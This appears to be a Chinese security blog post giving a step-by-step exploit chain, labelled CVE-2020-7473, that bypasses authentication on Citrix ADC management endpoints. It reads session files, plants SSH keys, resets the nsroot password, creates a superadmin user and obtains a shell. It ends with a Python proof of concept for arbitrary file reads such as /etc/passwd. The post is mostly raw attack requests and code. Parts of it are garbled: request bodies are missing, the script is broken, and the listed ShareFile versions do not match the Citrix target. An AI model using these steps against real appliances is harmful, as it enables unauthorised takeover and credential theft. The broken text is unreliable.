
# (CVE-2020-7473)Citrix 认证绕过getshell



ShareFile storage zones Controller 5.9.0

ShareFile storage zones Controller 5.8.0

ShareFile storage zones Controller 5.7.0

ShareFile StorageZones Controller 5.6.0

ShareFile StorageZones Controller 5.5.0

及ShareFile StorageZones Controller更早版本


### 0x01 CreateSession

> request

POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Range: bytes=0-102400
X-Nitro-Pass: jr9bt
X-Nitro-User: boej3

> response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:52:00 GMT
Server: Apache/2.4.34 (Unix)
Set-Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


### 0x02 fix session

> request

GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57
Range: bytes=0-102400

> response

HTTP/1.1 302 Found
Date: Sun, 12 Jul 2020 07:54:31 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=-1; expires=Wed, 07-Jul-2021 07:54:32 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
Content-Length: 416
Connection: close
Content-Type: text/html; charset=UTF-8

An internal server error was encountered
An internal server error was encountered

### 0x03 Get rand\_key

> request

GET /menu/stc HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400

> response

HTTP/1.1 206 Partial Content
Date: Sun, 12 Jul 2020 07:54:35 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Range: bytes 0-4149/4150
Content-Length: 15501
Connection: close
Content-Type: text/html; charset=UTF-8

Citrix ADC – Statistics

Error retrieving data.
return code = 354.
Error message = Invalid username or password.

note: var rand = \”181103693.1594540472072128\”;

### 0x04 re-break Session

> request

POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400

> response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:54:49 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


An internal server error was encountered
An internal server error was encountered


### 0x05 Read Dir

> request

POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31

> response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:27:04 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename=”nstmp”
Accept-Ranges: bytes
Content-Length: 512
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream


### 0x06 Read Session

> resquest

POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp%2Fsess_6c5c31300c22b200f0273e7a13be47cb HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31

> response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:30:33 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename=”sess_6c5c31300c22b200f0273e7a13be47cb”
Accept-Ranges: bytes
Content-Length: 2162
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

NSAPI|s:254:”##703FFFA9A2E71F7435B67182A95E196770FF69246DB68B6BE92E825B8A520D00F1FCF6E23F897090DBDEDBE817FFE81D1501200A8BB36C9FFA176EDA41E473DC240A804B90B8BFE1EC30DA87C6FAD3261A8B3C09C7BB82F97DDB3DB41A69CA0B849AFD6B17827463358B700D5847F91F78619B8FA1A98ED4DED3509AB11C”;NSAPI_DOMAIN|s:0:””;NSAPI_PATH|s:1:”/”;login_warning|s:0:””;sysid|s:6:”450070″;oemid|s:1:”0″;superuser|s:4:”true”;nsbw|i:0;ns_is_sgw|s:5:”false”;nsbrandDesc|s:7:”ADC VPX”;username|s:6:”nsroot”;timezone_offset|i:28800;nsversion|s:63:” NS12.1: Build 55.13.nc, Date: Nov 4 2019, 22:20:18 (64-bit)”;nsversion_error|b:0;ns_mode|i:2;nshostDesc|s:22:” (ADC01)”;nsbrand|s:2:”NS”;nsvpx|s:3:”VPX”;ns_model|s:4:”1000″;ns_aws_pin|s:0:””;ns_is_aws|s:5:”false”;ns_is_azure|s:5:”false”;ns_is_gcp|s:5:”false”;rand|s:26:”845810655.1594556994263502″;rand_key|s:26:”13590513441594556994263577″;licenseMap|a:62:{s:2:”wl”;b:1;s:2:”sp”;b:1;s:2:”lb”;b:1;s:2:”cs”;b:1;s:2:”cr”;b:1;s:2:”sc”;b:1;s:3:”cmp”;b:1;s:5:”delta”;b:0;s:2:”pq”;b:1;s:3:”ssl”;b:1;s:4:”gslb”;b:1;s:5:”gslbp”;b:1;s:5:”hdosp”;b:1;s:7:”routing”;b:1;s:2:”cf”;b:1;s:18:”contentaccelerator”;b:0;s:2:”ic”;b:0;s:6:”sslvpn”;b:1;s:14:”f_sslvpn_users”;s:4:”1000″;s:11:”f_ica_users”;s:1:”0″;s:3:”aaa”;b:1;s:4:”ospf”;b:1;s:3:”rip”;b:1;s:3:”bgp”;b:1;s:7:”rewrite”;b:1;s:6:”ipv6pt”;b:1;s:5:”appfw”;b:0;s:9:”responder”;b:1;s:4:”agee”;b:0;s:4:”nsxn”;b:1;s:13:”htmlinjection”;b:1;s:7:”modelid”;s:4:”1000″;s:4:”push”;b:1;s:6:”wionns”;b:1;s:7:”appflow”;b:1;s:11:”cloudbridge”;b:0;s:20:”cloudbridgeappliance”;b:0;s:22:”cloudextenderappliance”;b:0;s:4:”isis”;b:1;s:7:”cluster”;b:1;s:2:”ch”;b:1;s:6:”appqoe”;b:1;s:10:”appflowica”;b:1;s:13:”isstandardlic”;b:0;s:15:”isenterpriselic”;b:1;s:13:”isplatinumlic”;b:0;s:9:”issgwylic”;b:0;s:8:”isswglic”;b:0;s:4:”rise”;b:1;s:3:”feo”;b:1;s:3:”lsn”;b:1;s:13:”licensingmode”;s:5:”Local”;s:16:”daystoexpiration”;s:2:”50″;s:8:”rdpproxy”;b:1;s:3:”rep”;b:0;s:12:”urlfiltering”;b:0;s:17:”videooptimization”;b:0;s:12:”forwardproxy”;b:0;s:15:”sslinterception”;b:0;s:23:”remotecontentinspection”;b:1;s:11:”adaptivetcp”;b:0;s:3:”cqa”;b:0;}grouping_separator|s:1:”,”;decimal_separator|s:1:”.”;defaultpartition|s:7:”default”;

### 0x07 UploadFile Getshell

You Can Upload to /root/.ssh/authorized\_key Note: Get rand\_key &
SESSID from file:`sess_[32charactor]`

> request

POST /rapi/uploadtext HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://citrix.local/menu/neo
DNT: 1
rand_key: 845810655.1594556994263502
Cookie: SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo; is_cisco_platform=0; st_splitter=350px; rdx_pagination_size=25%20Per%20Page
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 92


> response

HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 06:15:05 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 34
Content-Type: application/json; charset=utf-8


### 0x08 ChangePassword && SSH

> request

PUT /nitro/v1/config/systemuser HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close


> response

HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 12:37:56 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Connection: close
Content-Type: application/json; charset=utf-8

{ “errorcode”: 0, “message”: “Done”, “severity”: “NONE” }
ssh nsroot@www.0-sec.org
# #
# WARNING: Access to this system is for authorized users only #
# Disconnect IMMEDIATELY if you are not an authorized user! #
# #

Last login: Sun Jul 12 14:12:44 2020 from
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.


### 0x09 CreateUser && SSH

> request:CreateUser

POST /nitro/v1/config/systemuser HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close


> response:CreateUser

HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:46:55 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8

{ “errorcode”: 0, “message”: “Done”, “severity”: “NONE” }
request:binding superadmin policy
POST /nitro/v1/config/systemuser_systemcmdpolicy_binding HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close

response:binding superadmin policy
HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:55:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8

{ “errorcode”: 0, “message”: “Done”, “severity”: “NONE” }
ssh nsroot1@www.0-sec.org
# #
# WARNING: Access to this system is for authorized users only #
# Disconnect IMMEDIATELY if you are not an authorized user! #
# #

Last login: Sun Jul 12 20:52:27 2020 from
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.


### poc


#!/usr/bin/env python

import requests
import sys
import string
import random
import json
from urllib.parse import quote


def random_string(length=8):
chars = string.ascii_letters + string.digits
random_string = ”.join(random.choice(chars) for x in range(length))
return random_string

def create_session(base_url, session):
url = ‘{0}/pcidss/report’.format(base_url)

params = {

headers = {

data = ‘
proxies = {“http”:””}
session.post(url=url, params=params, headers=headers, data=data, verify=False,proxies=proxies)
return session

def fix_session(base_url, session):
url = ‘{0}/menu/ss’.format(base_url)

params = {
proxies = {“http”:””}
session.get(url=url, params=params, verify=False,proxies=proxies)

def get_rand(base_url, session):
url = ‘{0}/menu/stc’.format(base_url)
proxies = {“http”:””}
r = session.get(url=url, verify=False,proxies=proxies)

for line in r.text.split(‘\n’):
if ‘var rand =’ in line:
rand = line.split(‘”‘)[1]
return rand

def do_lfi(base_url, session, rand):
url = ‘{0}/rapi/filedownload?filter=path:{1}’.format(base_url, PAYLOAD)

headers = {

data = ‘
proxies = {“http”:””}
r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
response_str = json.dumps(r.headers.__dict__[‘_store’])

if r.status_code == 406 and “Content-Disposition” in response_str and r.headers[“Accept-Ranges”] == “bytes” and r.headers[“Pragma”] == “private”:
print (“[+] Send Success!”)
print (“_”*80,”\n\n”)
print (r.text)
print (“_”*80)
while 1:
PAYLOAD1 = quote(input(“\n[+] Set File= “),”utf-8”)
url = ‘{0}/rapi/filedownload?filter=path:{1}’.format(base_url, PAYLOAD1)
r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
if r.status_code == 406 and “Content-Disposition” in response_str and r.headers[“Accept-Ranges”] == “bytes” and r.headers[“Pragma”] == “private”:
print (“_”*80,”\n\n”)
print (r.text)
print (“_”*80)
# pass
print (“[+] Error!”)

def main(base_url):
print (‘[-] Creating session..’)
session = requests.Session()
create_session(base_url, session)
print (‘[+] Got session: {0}’.format(session.cookies.get_dict()[‘SESSID’]))

print(‘[-] Fixing session..’)
fix_session(base_url, session)

print (‘[-] Getting rand..’)
rand = get_rand(base_url, session)
print (‘[+] Got rand: {0}’.format(rand))

print (‘[-] Re-breaking session..’)
create_session(base_url, session)

print (‘[-] Getting file..’)
do_lfi(base_url, session, rand)

if __name__ == ‘__main__’:
# Slashes need to be urlencoded
base_url = sys.argv[1]
if base_url[-1] == ‘/’:
base_url = base_url[:-1]
base_url = base_url
# PAYLOAD=’%2fetc%2fpasswd’
PAYLOAD = quote(input(“[+] Set File= “),”utf-8”)

© 版权声明
点赞0 分享
评论 抢沙发

